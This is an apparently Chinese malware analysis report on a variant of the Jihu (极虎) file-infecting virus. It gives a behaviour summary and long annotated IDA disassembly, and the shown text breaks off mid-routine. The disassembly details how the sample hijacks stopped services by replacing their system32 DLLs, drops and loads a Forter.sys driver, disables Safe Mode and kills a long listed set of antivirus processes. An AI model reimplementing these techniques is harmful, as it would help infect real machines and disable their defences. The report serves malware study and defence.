The virus in the attachment is a hidden file; debug it in a virtual machine.
The analysis was done in a hurry and some behaviour has not been examined carefully; comments and corrections are welcome ^_^
1. Overview
This document describes the behaviour and technical details of a variant of the Jihu (极虎) virus.
The virus spreads mainly over the Internet and local networks. It is 248,832 bytes in size and its implementation language is unknown. When run, it first determines where its own module is loaded: if it is at 0x0040000 it treats itself as an exe, opens a set of specified services, searches for their DLL files and, once a suitable one is found, rewrites itself with DLL attributes and replaces that DLL. If it is not at 0x0040000 it treats itself as a DLL, then disables Safe Mode, terminates antivirus software, downloads trojans, infects files of specified types, infects removable disks and attacks LAN users.
2. Behaviour summary
1) Virus name: Jihu virus (极虎病毒, also known as 虎虎生威)
2) Virus type: file infector
3) Virus size: 248,832 bytes
4) Propagation: Internet, LAN, removable storage media, drive-by web pages
5) Related files:
a 【极虎病毒】分析报告.doc : the analysis report
b 极虎病毒exe.v : the virus sample
c 极虎病毒.idb : the IDA database for the sample
6) Detailed behaviour:
a It compares its own module address with 0x0040000; if they match it runs as an exe. In that case it reads itself into memory, changes the image to DLL attributes, then walks a list of specified services, finds one that is stopped, locates the DLL belonging to it and replaces that DLL with itself.
b When loaded as a DLL it first searches for the avp.exe and bdagent.exe processes; if found, it writes a run of NOPs into them and then deletes them. It drops a driver file in the temp folder, loads it and then deletes it. It sets the service that corresponds to its own module to start at boot.
c It uses the driver to interfere with and terminate antivirus software, sending IOCTLs to the driver to install hooks and to kill AV processes. The AV process names it terminates are: KVMonXP.kxp, KVSrvXP.exe, avp.exe, avp.exe, avp.exe, RavMonD.exe, RavTask.exe, RsAgent.exe, rsnetsvr.exe, RsTray.exe, ScanFrm.exe, CCenter.exe, kavstart.exe, kissvc.exe, kpfw32.exe, kpfwsvc.exe, kswebshield.exe, kwatch.exe, kmailmon.exe, egui.exe, ekrn.exe, ccSvcHst.exe, ccSvcHst.exe, ccSvcHst.exe, Mcagent.exe, mcmscsvc.exe, McNASvc.exe, Mcods.exe, McProxy.exe, Mcshield.exe, mcsysmon.exe, mcvsshld.exe, MpfSrv.exe, McSACore.exe, msksrver.exe, sched.exe, avguard.exe, avmailc.exe, avwebgrd.exe, avgnt.exe, sched.exe, avguard.exe, avcenter.exe, UfSeAgnt.exe, TMBMSRV.exe, SfCtlCom.exe, TmProxy.exe, 360SoftMgrSvc.exe, 360tray.exe, qutmserv.exe, bdagent.exe, livesrv.exe, seccenter.exe, vsserv.exe, MPSVC.exe, MPSVC1.exe, MPSVC2.exe, MPMon.exe, ast.exe, 360speedld.exe, 360SoftMgrSvc.exe, 360tray.exe, 修复工具.exe, 360hotfix.exe, 360rpt.exe, 360safe.exe, 360safebox.exe, krnl360svc.exe, zhudongfangyu.exe, 360sd.exe, 360rp.exe, 360se.exe, safeboxTray.exe.
d It deletes the registry keys SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal and SYSTEM\CurrentControlSet\Control\SafeBoot\Network to disable Safe Mode, and modifies the hosts file. It infects files of the following types: exe, asp, aspx, asp, htm, html, rar. For exe files it adds a .tc section header and writes a run of shellcode at the end of the file; rar archives are first extracted to the temp folder, their contents infected and then re-packed; other file types get a script appended at the end. Before infecting, it skips system paths including WinRAR, WindowsUpdate, Windows NT, Windows Media Player, Outlook Express, NetMeeting, MSN Gaming Zone, Movie Maker, microsoft frontpage, Messenger, Internet Explorer, InstallShield Installation Information, ComPlus Applications, Common Files, RECYCLER, System Volume Information, Documents and Settings, WinNT, WINDOWS.
3. Removal
Because the virus disables Safe Mode and infects most files on the machine, manual removal is difficult; a dedicated removal tool is recommended.
[Main text follows]
4. Main text
.text:00401B7E call $+5
.text:00401B83 mov eax, [esp+2Ch+var_2C] ; get the current address
.text:00401B86 mov [ebp+lpAddress], eax
.text:00401B89 pop eax
.text:00401B8A push 1Ch ; size_t
.text:00401B8C push 0 ; int
.text:00401B8E lea eax, [ebp+Buffer]
.text:00401B91 push eax ; void *
.text:00401B92 call memset
.text:00401B97 add esp, 0Ch
.text:00401B9A push 1Ch ; dwLength
.text:00401B9C lea eax, [ebp+Buffer]
.text:00401B9F push eax ; lpBuffer
.text:00401BA0 push [ebp+lpAddress] ; lpAddress
.text:00401BA3 call ds:VirtualQuery
.text:00401BA9 mov eax, [ebp+Buffer.AllocationBase]
.text:00401BAC mov hModule, eax
.text:00401BB1 push 0 ; lpModuleName
.text:00401BB3 call ds:GetModuleHandleA
.text:00401BB9 cmp eax, hModule ; compare with its own module base
.text:00401BBF jnz short DllFile ; jump when running as a DLL
.text:00401BC1 push [ebp+arg_C]
.text:00401BC4 push [ebp+arg_8]
.text:00401BC7 push [ebp+arg_4]
.text:00401BCA push [ebp+arg_0]
.text:00401BCD call ExeRun ; run as an exe
.text:00401BD2 mov [ebp+var_24], eax
.text:00401BD5 jmp short loc_401BE8
.text:00401BD7 DllFile:
.text:00401BD7 push [ebp+arg_8]
.text:00401BDA push [ebp+arg_4]
.text:00401BDD push [ebp+arg_0]
.text:00401BE0 call DllRun ; run as a DLL
When running as an exe it first opens the named pipe \\\\.\\pipe\\96DBA249-E88E-4c47-98DC-E18E6E; if that succeeds it tries to read data from the pipe, and if it fails it checks the error code: when all pipe instances are busy the program exits. The implementation:
.text:0040657E push 0 ; hTemplateFile
.text:00406580 push 0 ; dwFlagsAndAttributes
.text:00406582 push 3 ; dwCreationDisposition
.text:00406584 push 0 ; lpSecurityAttributes
.text:00406586 push 0 ; dwShareMode
.text:00406588 push 0C0000000h ; dwDesiredAccess
.text:0040658D push [ebp+lpFileName] ; lpFileName
.text:00406590 call ds:CreateFileA ; try to open the pipe "\\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A"
.text:00406596 mov [ebp+hObject], eax
.text:00406599 cmp [ebp+hObject], 0FFFFFFFFh
.text:0040659D jnz short loc_4065C7 ; opened successfully: jump
.text:0040659F push 1 ; Buffer
.text:004065A1 lea eax, [ebp+String2]
.text:004065A7 push eax ; lpBuffer
.text:004065A8 call CreateBin ; open failed: create the file "C:\\DelInfo.bin"
.text:004065AD call ds:GetLastError
.text:004065B3 cmp eax, 0E7h ; error code 0E7h: all pipe instances are busy
.text:004065B8 jnz short Over_0 ; a different error: jump out
.text:004065BA push 0 ; uExitCode
.text:004065BC call ds:ExitProcess ; pipe busy: terminate the process
Execution continues here once the pipe has been opened:
=============================================================
.text:004065C7 mov [ebp+Mode], 2 ; pipe mode
.text:004065CE push 0 ; lpCollectDataTimeout
.text:004065D0 push 0 ; lpMaxCollectionCount
.text:004065D2 lea eax, [ebp+Mode] ; PIPE_READMODE_MESSAGE
.text:004065D5 push eax ; lpMode
.text:004065D6 push [ebp+hObject] ; hNamedPipe
.text:004065D9 call ds:SetNamedPipeHandleState ; set message-read and blocking mode
.text:004065DF push 0 ; lpOverlapped
.text:004065E1 lea eax, [ebp+NumberOfBytesRead]
.text:004065E4 push eax ; lpNumberOfBytesWritten
.text:004065E5 push 2 ; nNumberOfBytesToWrite
.text:004065E7 push offset byte_40BE6C ; lpBuffer
.text:004065EC push [ebp+hObject] ; hFile
.text:004065EF call ds:WriteFile ; write "DD" into the pipe
.text:004065F5 push 0 ; lpOverlapped
.text:004065F7 lea eax, [ebp+NumberOfBytesRead]
.text:004065FA push eax ; lpNumberOfBytesRead
.text:004065FB push 104h ; nNumberOfBytesToRead
.text:00406600 push offset String ; lpBuffer
.text:00406605 push [ebp+hObject] ; hFile
.text:00406608 call ds:ReadFile ; read data from the pipe
.text:0040660E push offset String ; lpString
.text:00406613 call ds:lstrlenA
.text:00406619 test eax, eax
.text:0040661B jnz short ReadSucceed ; data was read from the pipe: jump
.text:0040661D push [ebp+hObject] ; hObject
.text:00406620 call ds:CloseHandle
.text:00406626 push 1 ; Buffer
.text:00406628 lea eax, [ebp+String2]
.text:0040662E push eax ; lpBuffer
.text:0040662F call CreateBin
.text:00406634 push 0 ; uExitCode
.text:00406636 call ds:ExitProcess ; nothing read from the pipe: terminate
Once data has been read from the pipe, it uses strrchr to locate the ASCII character 2Eh ('.') in the string, then repeatedly reopens the pipe above until the file can no longer be found. The implementation:
.text:0040666C Next: ; CODE XREF:
.text:0040666C mov eax, [ebp+var_26C]
.text:00406672 inc eax
.text:00406673 mov [ebp+var_26C], eax
.text:00406679 loc_406679:
.text:00406679 cmp [ebp+var_26C], 64h
.text:00406680 jge short Over_1
.text:00406682 push 0 ; hTemplateFile
.text:00406684 push 0 ; dwFlagsAndAttributes
.text:00406686 push 3 ; dwCreationDisposition
.text:00406688 push 0 ; lpSecurityAttributes
.text:0040668A push 0 ; dwShareMode
.text:0040668C push 0C0000000h ; dwDesiredAccess
.text:00406691 push [ebp+lpFileName] ; lpFileName
.text:00406694 call ds:CreateFileA ; try to open "\\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A"
.text:0040669A mov [ebp+hObject], eax
.text:0040669D cmp [ebp+hObject], 0FFFFFFFFh
.text:004066A1 jnz short OpenPipeFail
.text:004066A3 call ds:GetLastError
.text:004066A9 cmp eax, 2 ; error code 2: the system cannot find the file specified
.text:004066AC jnz short Next_1
.text:004066AE jmp short Over_1 ; keep reopening the pipe; exit once it is no longer found
.text:004066B0 Next_1:
.text:004066B0 jmp short GetNext
.text:004066B2 OpenPipeFail:
.text:004066B2 push [ebp+hObject] ; hObject
.text:004066B5 call ds:CloseHandle
.text:004066BB GetNext:
.text:004066BB push 32h ; dwMilliseconds
.text:004066BD call ds:Sleep ; sleep 32h milliseconds
.text:004066C3 jmp short Next
Next it gets the full path of its own file, allocates a block of heap memory, reads itself into it and changes the image to DLL attributes:
.text:00401C0B push 104h ; nSize
.text:00401C10 lea eax, [ebp+FileName]
.text:00401C16 push eax ; lpFilename
.text:00401C17 push [ebp+hModule] ; hModule
.text:00401C1A call ds:GetModuleFileNameA
.text:00401C20 and [ebp+var_120], 0
.text:00401C27 jmp short loc_401C36
.text:00401C29 loc_401C29:
.text:00401C29 mov eax, [ebp+var_120]
.text:00401C2F inc eax
.text:00401C30 mov [ebp+var_120], eax
.text:00401C36 loc_401C36:
.text:00401C36 cmp [ebp+var_120], 32h
.text:00401C3D jge short loc_401C70
.text:00401C3F push 0 ; hTemplateFile
.text:00401C41 push 0 ; dwFlagsAndAttributes
.text:00401C43 push 3 ; dwCreationDisposition
.text:00401C45 push 0 ; lpSecurityAttributes
.text:00401C47 push 1 ; dwShareMode
.text:00401C49 push 80000000h ; dwDesiredAccess
.text:00401C4E lea eax, [ebp+FileName] ; its own file path
.text:00401C54 push eax ; lpFileName
.text:00401C55 call ds:CreateFileA ; open a handle to its own file
.text:00401C5B mov [ebp+hObject], eax
.text:00401C5E cmp [ebp+hObject], 0FFFFFFFFh
.text:00401C62 jz short loc_401C66 ; open failed: jump
.text:00401C64 jmp short loc_401C70
.text:00401C66 loc_401C66:
.text:00401C66 push 64h ; dwMilliseconds
.text:00401C68 call ds:Sleep
.text:00401C6E jmp short loc_401C29 ; jump back and retry opening itself
.text:00401C70 loc_401C70:
.text:00401C70 push 0 ; lpFileSizeHigh
.text:00401C72 push [ebp+hObject] ; hFile
.text:00401C75 call ds:GetFileSize ; open succeeded: get the file size
.text:00401C7B mov [ebp+nNumberOfBytesToRead], eax
.text:00401C7E cmp [ebp+nNumberOfBytesToRead], 0
.text:00401C82 jz short loc_401C8A ; size is 0: jump, close the handle and exit
.text:00401C84 cmp [ebp+nNumberOfBytesToRead], 0FFFFFFFFh
.text:00401C88 jnz short loc_401CA6 ; size is valid: jump and prepare memory for the read
.text:00401C8A loc_401C8A:
.text:00401C8A push [ebp+hObject] ; hObject
.text:00401C8D call ds:CloseHandle
.text:00401C93 mov eax, [ebp+arg_4]
.text:00401C96 and dword ptr [eax], 0
.text:00401C99 mov eax, [ebp+arg_8]
.text:00401C9C and dword ptr [eax], 0
.text:00401C9F xor eax, eax
.text:00401CA1 jmp locret_401D57
.text:00401CA6 loc_401CA6:
.text:00401CA6 mov eax, [ebp+arg_8]
.text:00401CA9 mov ecx, [ebp+nNumberOfBytesToRead]
.text:00401CAC mov [eax], ecx
.text:00401CAE mov eax, [ebp+nNumberOfBytesToRead]
.text:00401CB1 add eax, 20h
.text:00401CB4 push eax ; unsigned int
.text:00401CB5 call ??2@YAPAXI@Z ; operator new(uint)
.text:00401CBA pop ecx
.text:00401CBB mov [ebp+var_124], eax
.text:00401CC1 mov eax, [ebp+var_124]
.text:00401CC7 mov [ebp+lpBuffer], eax
.text:00401CCD mov eax, [ebp+arg_4]
.text:00401CD0 mov ecx, [ebp+lpBuffer]
.text:00401CD6 mov [eax], ecx
.text:00401CD8 mov eax, [ebp+nNumberOfBytesToRead]
.text:00401CDB add eax, 20h
.text:00401CDE push eax ; size_t
.text:00401CDF push 0 ; int
.text:00401CE1 push [ebp+lpBuffer] ; void *
.text:00401CE7 call memset ; zero the allocated memory
.text:00401CEC add esp, 0Ch
.text:00401CEF push 0 ; lpOverlapped
.text:00401CF1 lea eax, [ebp+NumberOfBytesRead]
.text:00401CF4 push eax ; lpNumberOfBytesRead
.text:00401CF5 push [ebp+nNumberOfBytesToRead] ; nNumberOfBytesToRead
.text:00401CF8 push [ebp+lpBuffer] ; lpBuffer
.text:00401CFE push [ebp+hObject] ; hFile
.text:00401D01 call ds:ReadFile ; read its own file into the buffer
.text:00401D07 push [ebp+hObject] ; hObject
.text:00401D0A call ds:CloseHandle
.text:00401D10 and [ebp+var_10], 0
.text:00401D14 mov eax, [ebp+lpBuffer]
.text:00401D1A mov ecx, [ebp+lpBuffer]
.text:00401D20 add ecx, [eax+3Ch] ; add e_lfanew, the last field of the DOS header, so ecx points to the NT headers
.text:00401D23 mov [ebp+var_10], ecx
.text:00401D26 cmp [ebp+hModule], 0
.text:00401D2A jz short loc_401D41 ; zero here means it is reading itself
.text:00401D2C mov eax, [ebp+var_10]
.text:00401D2F movzx eax, word ptr [eax+16h]
.text:00401D33 and eax, 0DFFFh ; change the Characteristics field (NT+16h) to the DLL attribute
It gets the temp folder path and the Windows directory, then looks up the function with ordinal 5 in "sfc_os.dll"; if that DLL fails to load it jumps away and reads the data from the registry instead. It opens the Service Control Manager and loops through the services; when a service is stopped it replaces that service's DLL with its own file (now carrying DLL attributes) and exits; if that fails it goes back and queries the next service.
.text:004020AE push 104h ; uSize
.text:004020B3 lea eax, [ebp+Buffer]
.text:004020B9 push eax ; lpBuffer
.text:004020BA call ds:GetWindowsDirectoryA ; get the Windows directory
.text:004020C0 push 104h ; size_t
.text:004020C5 push 0 ; int
.text:004020C7 lea eax, [ebp+TempPath]
.text:004020CD push eax ; void *
.text:004020CE call memset
.text:004020D3 add esp, 0Ch
.text:004020D6 lea eax, [ebp+TempPath]
.text:004020DC push eax ; lpBuffer
.text:004020DD push 104h ; nBufferLength
.text:004020E2 call ds:GetTempPathA ; get the temp folder path
.text:004020E8 push 0F003Fh ; dwDesiredAccess
.text:004020ED push 0 ; lpDatabaseName
.text:004020EF push 0 ; lpMachineName
.text:004020F1 call ds:OpenSCManagerA ; open the Service Control Manager
.text:004020F7 mov [ebp+hSCManager], eax
.text:004020FA push offset LibFileName ; "sfc_os.dll"
.text:004020FF call ds:LoadLibraryA
.text:00402105 mov [ebp+hLibModule], eax
.text:0040210B cmp [ebp+hLibModule], 0
.text:00402112 jnz short GetFunAddNo5 ; DLL loaded: jump
.text:00402114 jmp GetVauleReg
.text:00402119 jmp GetVauleReg
.text:0040211E GetFunAddNo5:
.text:0040211E push 5 ; lpProcName
.text:00402120 push [ebp+hLibModule] ; hModule
.text:00402126 call ds:GetProcAddress ; get the address of the function with ordinal 5
.text:0040212C mov FunNO5sfc_os, eax
.text:00402141 NextService:
.text:00402141 mov eax, [ebp+var_B8C]
.text:00402147 inc eax
.text:00402148 mov [ebp+var_B8C], eax
.text:0040214E loc_40214E:
.text:0040214E push [ebp+var_B8C] ; int
.text:00402154 push 0 ; int
.text:00402156 push 40h ; int
.text:00402158 lea eax, [ebp+ServiceName]
.text:0040215E push eax ; lpString1
.text:0040215F call sub_401879 ; unpack the service name
.text:00402164 cmp eax, 0FFFFFFFFh
.text:00402167 jnz short loc_40218A
.text:00402169 cmp [ebp+var_784], 0
.text:00402170 jnz short loc_402185 ; unpacking failed: jump to the registry fallback
.text:00402172 mov [ebp+var_784], 1
.text:0040217C or [ebp+var_B8C], 0FFFFFFFFh
.text:00402183 jmp short NextService
.text:00402185 loc_402185:
.text:00402185 jmp GetVauleReg ; read the data from the registry instead
.text:0040218A loc_40218A:
.text:0040218A push [ebp+var_B8C] ; int
.text:00402190 push 1 ; int
.text:00402192 push 40h ; int
.text:00402194 lea eax, [ebp+String1]
.text:0040219A push eax ; lpString1
.text:0040219B call sub_401879
.text:004021A0 push offset String ; lpString2
.text:004021A5 lea eax, [ebp+String1]
.text:004021AB push eax ; lpString1
.text:004021AC call ds:lstrcmpiA
.text:004021B2 test eax, eax
.text:004021B4 jnz short loc_4021B8
.text:004021B6 jmp short NextService
.text:004021B8 loc_4021B8:
.text:004021B8 push 0F01FFh ; dwDesiredAccess
.text:004021BD lea eax, [ebp+ServiceName]
.text:004021C3 push eax ; lpServiceName
.text:004021C4 push [ebp+hSCManager] ; hSCManager
.text:004021C7 call ds:OpenServiceA
.text:004021CD mov [ebp+hSCObject], eax
.text:004021D3 cmp [ebp+hSCObject], 0
.text:004021DA jnz short OpenSucceed ; service opened: jump
.text:004021DC jmp NextService
.text:004021E1 OpenSucceed:
.text:004021E1 push 1Ch ; size_t
.text:004021E3 push 0 ; int
.text:004021E5 lea eax, [ebp+ServiceStatus]
.text:004021EB push eax ; void *
.text:004021EC call memset
.text:004021F1 add esp, 0Ch
.text:004021F4 lea eax, [ebp+ServiceStatus]
.text:004021FA push eax ; lpServiceStatus
.text:004021FB push [ebp+hSCObject] ; hService
.text:00402201 call ds:QueryServiceStatus ; query the service status
.text:00402207 cmp [ebp+ServiceStatus.dwCurrentState], 1
; SERVICE_STOPPED
.text:0040220E jz short ReplaceDll ; service is stopped: jump
.text:00402210 cmp [ebp+var_784], 0
.text:00402217 jnz short ControlThisService
.text:00402219 jmp CloseThisNext ; jump: close this service and take the next one
.text:00402223 ControlThisService:
.text:00402223 lea eax, [ebp+ServiceStatus]
.text:00402229 push eax ; lpServiceStatus
.text:0040222A push 1 ; dwControl
.text:0040222C push [ebp+hSCObject] ; hService
.text:00402232 call ds:ControlService ; service still running: stop it
.text:00402238 test eax, eax
.text:0040223A jnz short ReplaceDll ; service stopped: jump
.text:0040223C jmp CloseThisNext ; jump: close this service and take the next one
.text:00402246 ReplaceDll:
.text:00402246 push 104h ; size_t
.text:0040224B push 0 ; int
.text:0040224D lea eax, [ebp+FileName]
.text:00402253 push eax ; void *
.text:00402254 call memset
.text:00402259 add esp, 0Ch
.text:0040225C lea eax, [ebp+String1]
.text:00402262 push eax
.text:00402263 lea eax, [ebp+Buffer]
.text:00402269 push eax
.text:0040226A push offset aSSystem32S_dll ; "%s\\system32\\%s.dll"
.text:0040226F lea eax, [ebp+FileName]
.text:00402275 push eax ; LPSTR
.text:00402276 call ds:wsprintfA ; build the DLL path; in this debug session it was "C:\WINDOWS\system32\appmgmts.dll"
.text:0040227C add esp, 10h
.text:0040227F lea eax, [ebp+FileName]
.text:00402285 push eax ; lpFileName
.text:00402286 call ReplaceDll ; replace the DLL and set its creation time to the original's
; in this debug session the target was "C:\WINDOWS\system32\appmgmts.dll"
.text:0040228B test eax, eax
.text:0040228D jnz short GoStarService
.text:00402291 jmp short CloseThisNext ; jump: close this service and take the next one
.text:00402293 GoStarService:
.text:00402293 push 0 ; lpServiceArgVectors
.text:00402295 push 0 ; dwNumServiceArgs
.text:00402297 push [ebp+hSCObject] ; hService
.text:0040229D call ds:StartServiceA ; start the service that was stopped
.text:004022A3 test eax, eax
.text:004022A5 jnz short ServiceOver ; service restarted: jump
.text:004022A7 jmp short CloseThisNext ; jump: close this service and take the next one
.text:004022A9 jmp short CloseThisNext ; jump: close this service and take the next one
.text:004022AB ServiceOver:
.text:004022AB push [ebp+hLibModule] ; hLibModule
.text:004022B1 call ds:FreeLibrary
.text:004022B7 push [ebp+hSCObject] ; hSCObject
.text:004022BD call ds:CloseServiceHandle
.text:004022C3 push [ebp+hSCManager] ; hSCObject
.text:004022C6 call ds:CloseServiceHandle
.text:004022CC cmp dword_40DC3C, 0
.text:004022D3 jz short ExitThisProcess ; DLL replaced and service restarted: jump to exit
.text:004022D5 mov eax, dword_40DC3C
.text:004022DA mov [ebp+var_C30], eax
.text:004022E0 push [ebp+var_C30] ; void *
.text:004022E6 call ??3@YAXPAX@Z ; operator delete(void *)
.text:004022EB pop ecx
.text:004022EC ExitThisProcess:
.text:004022EC push 0 ; uExitCode
.text:004022EE call ds:ExitProcess
.text:004022F4 CloseThisNext:
.text:004022F4 push [ebp+hSCObject] ; hSCObject
.text:004022FA call ds:CloseServiceHandle
.text:00402300 jmp NextService ; jump back for the next service
When unpacking the data fails, or the DLL fails to load, it reads the data from the registry instead:
.text:00402305 GetVauleReg: ;
.text:00402305 push 400h ; size_t
.text:0040230A push 0 ; int
.text:0040230C lea eax, [ebp+Data]
.text:00402312 push eax ; void *
.text:00402313 call memset
.text:00402318 add esp, 0Ch
.text:0040231B mov [ebp+cbData], 400h
.text:00402322 lea eax, [ebp+hKey]
.text:00402325 push eax ; phkResult
.text:00402326 push 1 ; samDesired
.text:00402328 push 0 ; ulOptions
.text:0040232A push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
.text:0040232F push 80000002h ; hKey
.text:00402334 call ds:RegOpenKeyExA
.text:0040233A mov dword ptr [ebp+ValueName], 7374656Eh ; "nets"
.text:00402344 mov [ebp+var_77C], 736376h ; "vcs": the value name is "netsvcs"
.text:0040234E lea eax, [ebp+cbData]
.text:00402351 push eax ; lpcbData
.text:00402352 lea eax, [ebp+Data]
.text:00402358 push eax ; lpData
.text:00402359 lea eax, [ebp+Type]
.text:0040235F push eax ; lpType
.text:00402360 push 0 ; lpReserved
.text:00402362 lea eax, [ebp+ValueName]
.text:00402368 push eax ; lpValueName
.text:00402369 push [ebp+hKey] ; hKey
.text:0040236C call ds:RegQueryValueExA ; read the value from the registry
.text:00402372 push [ebp+hKey] ; hKey
.text:00402375 call ds:RegCloseKey
.text:0040237B lea eax, [ebp+Data]
.text:00402381 mov [ebp+lpString], eax ; start of the data read from the registry
.text:00402384 GetNext_1:
.text:00402384 mov eax, [ebp+lpString]
.text:00402387 movsx eax, byte ptr [eax]
.text:0040238A test eax, eax
.text:0040238C jz over_1 ; end of the registry data (zero byte): jump and exit
.text:00402392 push offset String ; lpString2
.text:00402397 push [ebp+lpString] ; lpString1
.text:0040239A call ds:lstrcmpiA
.text:004023A0 test eax, eax
.text:004023A2 jnz short loc_4023A6
.text:004023A4 jmp short GetNext_1
.text:004023A6 loc_4023A6:
.text:004023A6 push 400h ; size_t
.text:004023AB push 0 ; int
.text:004023AD lea eax, [ebp+BinaryPathName]
.text:004023B3 push eax ; void *
.text:004023B4 call memset
.text:004023B9 add esp, 0Ch
.text:004023BC push offset aVcs ; "vcs"
.text:004023C1 push offset aOst_exe ; "ost.exe"
.text:004023C6 push offset aSystemrootSyst
; "%SystemRoot%\\System32\\svch%s -k nets"
.text:004023CB push offset aSS_0 ; "%s%s"
.text:004023D0 lea eax, [ebp+BinaryPathName]
.text:004023D6 push eax ; LPSTR
.text:004023D7 call ds:wsprintfA ; "%SystemRoot%\\System32\\svchost.exe -k nets"
.text:004023DD add esp, 14h
.text:004023E0 push 0 ; lpPassword
.text:004023E2 push 0 ; lpServiceStartName
.text:004023E4 push 0 ; lpDependencies
.text:004023E6 push 0 ; lpdwTagId
.text:004023E8 push 0 ; lpLoadOrderGroup
.text:004023EA lea eax, [ebp+BinaryPathName] ; "%SystemRoot%\\System32\\svchost.exe -k nets"
.text:004023F0 push eax ; lpBinaryPathName
.text:004023F1 push 1 ; dwErrorControl
.text:004023F3 push 2 ; dwStartType
.text:004023F5 push 20h ; dwServiceType
.text:004023F7 push 10h ; dwDesiredAccess
.text:004023F9 push [ebp+lpString] ; lpDisplayName
.text:004023FC push [ebp+lpString] ; lpServiceName
.text:004023FF push [ebp+hSCManager] ; hSCManager
.text:00402402 call ds:CreateServiceA
.text:00402408 mov [ebp+hSCObject], eax
.text:0040240E cmp [ebp+hSCObject], 0
.text:00402415 jz Next_2
.text:0040241B push [ebp+lpString]
.text:0040241E lea eax, [ebp+Buffer]
.text:00402424 push eax
.text:00402425 push offset aSSystem32S_dll ; "%s\\system32\\%s.dll"
.text:0040242A lea eax, [ebp+FileName]
.text:00402430 push eax ; LPSTR
.text:00402431 call ds:wsprintfA
.text:00402437 add esp, 10h
.text:0040243A lea eax, [ebp+FileName]
.text:00402440 push eax ; lpData
.text:00402441 push [ebp+lpString] ; int
.text:00402444 call GetDllName ; get the DLL name from the registry
.text:00402449 lea eax, [ebp+FileName]
.text:0040244F push eax ; lpFileName
.text:00402450 call ReplaceDll ; replace the DLL named above
.text:00402455 test eax, eax
.text:00402457 jnz short ReadReplace ; replaced: jump and start the service
.text:00402459 jmp short Next_2
.text:0040245B jmp short Next_2
.text:0040245D ReadReplace: ; CODE XREF: ExeRun+42B j
.text:0040245D push 0 ; lpServiceArgVectors
.text:0040245F push 0 ; dwNumServiceArgs
.text:00402461 push [ebp+hSCObject] ; hService
.text:00402467 call ds:StartServiceA
.text:0040246D test eax, eax
.text:0040246F jnz short Over_2 ; service started: jump to exit
.text:00402471 jmp short Next_2
.text:00402473 jmp short Next_2
.text:00402475 Over_2:
.text:00402475 push [ebp+hLibModule] ; hLibModule
.text:0040247B call ds:FreeLibrary
.text:00402481 push [ebp+hSCObject] ; hSCObject
.text:00402487 call ds:CloseServiceHandle
.text:0040248D push [ebp+hSCManager] ; hSCObject
.text:00402490 call ds:CloseServiceHandle
.text:00402496 cmp dword_40DC3C, 0
.text:0040249D jz short ExitThisProcess_1
.text:0040249F mov eax, dword_40DC3C
.text:004024A4 mov [ebp+var_C34], eax
.text:004024AA push [ebp+var_C34] ; void *
.text:004024B0 call ??3@YAXPAX@Z ; operator delete(void *)
.text:004024B5 pop ecx
.text:004024B6 ExitThisProcess_1:
.text:004024B6 push 0 ; uExitCode
.text:004024B8 call ds:ExitProcess
.text:004024BE Next_2:
.text:004024BE push [ebp+lpString] ; lpString
.text:004024C1 call ds:lstrlenA
.text:004024C7 mov ecx, [ebp+lpString]
.text:004024CA lea eax, [ecx+eax+1]
.text:004024CE mov [ebp+lpString], eax
.text:004024D1 jmp GetNext_1
That concludes the exe path; below is what the program does when it runs as a DLL. First, inside the CreateBin function, it checks whether the current process name is "booter.exe", "CONFIG.exe" or "boottemp.exe". If it is not, it looks for the "avp.exe" and "bdagent.exe" processes; this is done by enumerating processes and comparing names, so that code is not shown here.
.text:0040540D push offset aAvp_exe ; "avp.exe"
.text:00405412 call CheckProcess
.text:00405417 test eax, eax
.text:00405419 jnz short GoWriteNop ; found: jump, write a run of 90h (NOP) bytes, then delete
.text:0040541B push offset aBdagent_exe ; "bdagent.exe"
.text:00405420 call CheckProcess ; search for these two AV processes by enumerating processes
.text:00405425 test eax, eax
.text:00405427 jz short GoRevertData
.text:00405429 GoWriteNop: ; CODE XREF: MainGN+7C j
.text:00405429 call WriteNop ; write a run of 90h (NOP) bytes, then delete
Next it unpacks a series of strings: AV process names, network user names and weak passwords, URLs and so on. Once unpacking is finished it creates the driver file "Forter.sys" in the temp folder:
.text:004054D7 push offset TempPath ; lpBuffer
.text:004054DC push 104h ; nBufferLength
.text:004054E1 call ds:GetTempPathA
.text:004054E7 push 104h ; size_t
.text:004054EC push 0 ; int
.text:004054EE push offset SystemDirector ; void *
.text:004054F3 call memset
.text:004054F8 add esp, 0Ch
.text:004054FB push 104h ; uSize
.text:00405500 push offset SystemDirector ; lpBuffer
.text:00405505 call ds:GetSystemDirectoryA
.text:0040550B push 104h ; size_t
.text:00405510 push 0 ; int
.text:00405512 lea eax, [ebp+FileName]
.text:00405518 push eax ; void *
.text:00405519 call memset
.text:0040551E add esp, 0Ch
.text:00405521 push offset aForter_sys ; "Forter.sys"
.text:00405526 push offset TempPath
.text:0040552B push offset aSS_0 ; "%s%s"
.text:00405530 lea eax, [ebp+FileName]
.text:00405536 push eax
.text:00405537 call [ebp+wsprintfA]
.text:0040553A add esp, 10h
.text:0040553D push 80h ; int
.text:00405542 push 65h ; int
.text:00405544 push hModule ; hModule
.text:0040554A lea eax, [ebp+FileName]
.text:00405550 push eax ; int
.text:00405551 call CallLoadResource ; create "Forter.sys" in the temp folder
.text:00405556 lea eax, [ebp+FileName]
.text:0040555C push eax ; lpBinaryPathName
.text:0040555D call StartService_1 ; start the "Forter.sys" service
.text:00405562 push 400h ; size_t
.text:00405567 push 0 ; int
.text:00405569 lea eax, [ebp+String]
.text:0040556F push eax ; void *
.text:00405570 call memset
.text:00405575 add esp, 0Ch
.text:00405578 push offset DisplayName ; "Forter"
.text:0040557D push off_40B548 ; "SYSTEM\\CurrentControlSet\\Services"
.text:00405583 push offset aSS ; "%s\\%s"
.text:00405588 lea eax, [ebp+String]
.text:0040558E push eax ; LPSTR
.text:0040558F call ds:wsprintfA
.text:00405595 add esp, 10h
.text:00405598 lea eax, [ebp+String]
.text:0040559E push eax
.text:0040559F push 80000002h
.text:004055A4 call [ebp+SHDeleteKeyA] ; delete SYSTEM\\CurrentControlSet\\Services\\Forter
.text:004055AA lea eax, [ebp+FileName]
.text:004055B0 push eax ; lpFileName
.text:004055B1 call ds:DeleteFileA ; delete "Forter.sys" from the temp folder
Next it shuts down antivirus software; the process names it targets are those listed in section 2, item c above.
The steps for shutting down the antivirus software:
.text:0040528C mov [ebp+AntiVirsName], offset AntiVName ; first AV process name
.text:00405293 Next_2:
